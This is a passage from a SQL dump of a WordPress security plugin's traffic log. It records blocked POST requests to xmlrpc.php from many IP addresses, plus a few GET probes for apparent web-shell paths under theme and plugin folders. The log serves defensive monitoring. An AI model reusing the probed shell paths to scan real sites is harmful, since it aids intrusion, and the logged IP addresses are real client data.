Safari\\/537.36\"}','jtqQoMkaYV1d3wlb98KHTrA5',0,1681071175.8321,1574,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','kqSDwc14Rx6geXF5mUJKo0id',0,1681071368.4550,574,'','POST',403,0,515,0,1,'',0),('92.205.148.93',1556976733,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','xmPesvzObuthY0DLJXCjnVNK',0,1681071371.6586,572,'','POST',403,0,515,0,1,'',0),('107.190.139.114',1807649650,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','MNp4OJ7TWVRK2wXbylGeIFiD',0,1681071373.5597,560,'','POST',403,0,515,0,1,'',0),('92.51.149.160',1546884512,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','ZDdJHn5B4NWVEibAwOe8tg0I',0,1681071382.5453,603,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','uA42cJHnIoTWD589zmsaXNhp',0,1681071385.7227,550,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','FUGejkwl4s5W9rBHK3JfOSPI',0,1681071386.8135,595,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','cykBhPqNR4mVFbiQJtrzUMfs',0,1681071398.7207,564,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','PnEcoyHNM4x3zaWu0JrL9T8d',0,1681071404.6559,573,'','POST',403,0,515,0,1,'',0),('116.118.51.5',1953903365,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QWSXH8e6Pz0FOLJERyUIGpTD',0,1681071406.4504,544,'','POST',403,0,515,0,1,'',0),('146.70.115.139',2454090635,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Uohu61H5OsGMqPpejSDy3li2',0,1681072725.5674,2197,'','POST',403,0,515,0,1,'',0),('185.200.117.131',3116922243,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TnvhpHjlSNr5gYGQkc2OADmJ',0,1681072853.8035,1470,'','POST',403,0,515,0,1,'',0),('82.102.23.131',1382422403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','q2gRJVb1T4rXfvaWjQBcCpmK',0,1681073638.5435,3568,'','POST',403,0,515,0,1,'',0),('64.42.179.51',1076540211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MDPnlZhUzY6vt0kV5L1dsgQW',0,1681075110.2842,3466,'','POST',403,0,515,0,1,'',0),('89.238.150.43',1508808235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mGxaNFUu5sPZpETt7VRA4zwC',0,1681075200.2177,1277,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','1OQwgZYFITui49zRBbWoyPnD',0,1681075316.7814,596,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','P2HWSNmZK3RQX06xLe57nVtG',0,1681075322.9015,622,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','fmYpuinMZ2AUWzDrPgBNj6Ht',0,1681075324.3899,581,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','I8LHT7ijSNdugvn9lhmfZbpM',0,1681075334.7333,572,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','K1hLfaz9N2CmS4qbWnkHYvyE',0,1681075335.9487,557,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','volSkpmKf4di23VRX7eD8hOg',0,1681075340.3196,537,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','DA6txhdZ2BG3YcPQiy7HfoVp',0,1681075350.6356,575,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','LEhVNyfe3G4BkTUgHZIjonzR',0,1681075351.8523,570,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','6mje5ibr7yPUX2fEROJpFvQk',0,1681075357.0144,612,'','POST',403,0,515,0,1,'',0),('213.152.162.181',3583550133,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8aPXkRzmxbd0cCotAJTY5UfE',0,1681076169.4203,3790,'','POST',403,0,515,0,1,'',0),('185.189.112.11',3116199947,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OLE4yrBzmMgHf59J7AZWRcdl',0,1681076640.5228,2390,'','POST',403,0,515,0,1,'',0),('185.156.175.43',3114053419,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','erdVLTDA49lI5n1ySEMxqokh',0,1681077423.1163,4220,'','POST',403,0,515,0,1,'',0),('134.19.179.171',2249438123,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ne8Ta7gXWFYvq9lPmOpZJ2kQ',0,1681078080.8913,3916,'','POST',403,0,515,0,1,'',0);
INSERT INTO `cerber_traffic` VALUES ('31.3.152.100',520329316,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7ohwxB36aF2VSTUeJrsbAIW9',0,1681078451.7603,1601,'','POST',403,0,515,0,1,'',0),('62.102.148.130',1046910082,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TfOi531RCZ8lMp7wNW0sycSm',0,1681078493.2003,1375,'','POST',403,0,515,0,1,'',0),('185.182.57.22',3115727126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','e74Np6YiXcBGv1twyFnrU2uK',0,1681078847.8025,1843,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','XGKiakIVYFBH037r1flcpmQj',0,1681078848.8542,1335,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RPdFlBqpuGI9JQany46fbLck',0,1681078852.1376,617,'','POST',403,0,515,0,1,'',0),('184.168.100.170',3098043562,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','OqnwDvzxTlGbRapBoJ3cIZ84',0,1681078854.2585,556,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','WqnYTCRHyXzuDSAoUBb742EG',0,1681078859.1113,670,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','aQjwdygtmGIFVxTW9huNEZCP',0,1681078859.8515,572,'','POST',403,0,515,0,1,'',0),('198.38.86.87',3324401239,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','dhuM9zF2RS1OijgLbBTaKDUI',0,1681078869.1750,587,'','POST',403,0,515,0,1,'',0),('184.75.223.235',3091980267,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zA21hl9NZEavTwVYcqfoO4Dk',0,1681078986.1094,2751,'','POST',403,0,515,0,1,'',0),('213.152.162.69',3583550021,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7F18b4ZnuNvLiOCzgpXrVjxR',0,1681079143.1625,3551,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','5C82ews1KzQboMVmvNGaOWlk',0,1681080286.1051,3542,'','POST',403,0,515,0,1,'',0),('103.142.25.164',1737365924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','ZrjhHcknlLu9qPo2YxFisSp1',0,1681080291.1643,1695,'','POST',403,0,515,0,1,'',0),('104.131.97.141',1753440653,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','U6oxd21D3mBVHCRiypNAjSh7',0,1681080292.2606,1229,'','POST',403,0,515,0,1,'',0),('43.143.239.49',730853169,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','di6swoEqNQAckCIZnzhT4Gby',0,1681080295.2434,836,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','G7KYc406SsA193ITJUXxWjep',0,1681080302.4418,1600,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','ROtJN9T27lfrBSXQuWFwp4Lk',0,1681080306.9065,651,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','mVwzsE3MKRXIJx6uo2ec801Y',0,1681080321.4906,850,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','HR2T8gCnKkDJ5mWh7AQux1j9',0,1681080322.0891,780,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','xRlSqKdVtTuWr8FXhJE3OU7P',0,1681080332.0968,598,'','POST',403,0,515,0,1,'',0),('178.162.204.214',2997013718,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cZKGs3njLrkiXzMbA5lTVqNt',0,1681080436.7881,2862,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KbrIsFjtCU4A78GV6O5iBkgq',0,1681080854.7527,2367,'','POST',403,0,515,0,1,'',0),('184.168.100.170',3098043562,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','8rSaCeEhq2InLy3zX7RDHTkv',0,1681082961.3926,4154,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','FAoUnw3MgC5Il2N4imSthsER',0,1681082964.2596,1585,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','Ir5WMJv1D4Oyt3d8CFTBGZRK',0,1681082968.4956,558,'','POST',403,0,515,0,1,'',0),('185.182.57.22',3115727126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','1MaHQrv2cepwCYUKgknRlyNs',0,1681082973.3760,1095,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','4SzkXB0bNVCEexoAgqwL9JmU',0,1681082973.8494,1037,'','POST',403,0,515,0,1,'',0),('34.83.145.5',575901957,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','tzLCZmKhvrWc7QBlkaqAT5wR',0,1681082980.8110,574,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','u8grqVnC207ZtREIkQyx5lN6',0,1681082986.7540,577,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','TaNDKSxUJMV9Q8rRhLis6Z3q',0,1681082989.8079,2051,'','POST',403,0,515,0,1,'',0),('209.236.124.38',3521936422,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','lcqs50XIWh14eovVbZjgHUwM',0,1681082990.7596,1954,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','cflnJ7H6kmOg4UVadQB1b3sq',0,1681083005.6287,663,'','POST',403,0,515,0,1,'',0),('91.231.84.41',1541887017,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','HqJzuiPj3xbh7RvkUend9gmL',0,1681083014.1728,3242,'','POST',403,0,515,0,1,'',0),('91.231.84.41',1541887017,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FwoGJcl94hASR7p1IyaCdgsW',0,1681083067.7073,601,'','POST',403,0,515,0,1,'',0),('95.216.148.85',1608029269,'','http://cmdev-site1.com/wp-content/themes/finley/min.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','4CivAYuVPjIzbkm7BJEGlNow',0,1681083757.0559,560,'','GET',403,0,700,0,1,'',0),('213.152.161.101',3583549797,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XQIsWD9F70oLaU6Bc8wlVu3q',0,1681084110.8366,1419,'','POST',403,0,515,0,1,'',0),('46.19.137.116',773032308,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VG7o8wZX2JzRk1FW03DCp4Is',0,1681085656.6214,743,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','l2bTCOIvkuYh6R9GFpe5drmw',0,1681085875.5039,3579,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Qp0ItAmHw9h5K1E2MBZbivVF',0,1681085878.7589,760,'','POST',403,0,515,0,1,'',0),('162.255.118.205',2734651085,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','ywUup2GiRslFHQo3cNSfbBtY',0,1681085883.4336,580,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','OTxodSnkvgmfpMHuDl7qWP3C',0,1681085884.3941,610,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','dxtkHzDYVbu1wycPaJqrMC4T',0,1681085889.6063,708,'','POST',403,0,515,0,1,'',0),('122.114.158.225',2054332129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','eiyNX3HYrsT97hFbGojCJMl6',0,1681085893.8437,541,'','POST',403,0,515,0,1,'',0),('176.53.14.119',2956267127,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','N6zvi0Iub3GmYs7KokBJPpR9',0,1681085899.3948,564,'','POST',403,0,515,0,1,'',0),('45.77.11.71',760023879,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','g9HKbsY61aChz8dwN3pZvJtF',0,1681085917.8548,585,'','POST',403,0,515,0,1,'',0),('178.162.204.238',2997013742,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uLfTZMvcKAo0wtW8iS6Qsgzy',0,1681086860.4668,4034,'','POST',403,0,515,0,1,'',0),('95.216.148.85',1608029269,'','http://cmdev-site1.com/wp-content/themes/blafos/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','OPl5xpBAc6zJDLkyZtaYoIvu',0,1681089771.0212,297,'','GET',403,0,700,0,1,'',0),('213.152.161.20',3583549716,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sXY1zO2ItNmbig0jKTepDM96',0,1681090281.2971,3569,'','POST',403,0,515,0,1,'',0),('95.216.148.85',1608029269,'','http://cmdev-site1.com/wp-content/plugins/w0rdpr3ssnew/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','K9cVJCjNzDrqXhvl3oe6pE8G',0,1681090870.9196,1954,'','GET',403,0,700,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','yLd5Z9M1Xfr4kAH8qQSuxCtb',0,1681090996.6974,859,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','wyTG8MmgcindLvA17H0XIVCU',0,1681090999.1561,624,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','ke70NwJEidfBQa2gvGAK3xDP',0,1681091007.8115,665,'','POST',403,0,515,0,1,'',0),('103.179.190.218',1739833050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','UM61ajJEPmiSCX7f8FxwTgzW',0,1681091038.3535,1411,'','POST',403,0,515,0,1,'',0),('122.114.32.5',2054299653,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 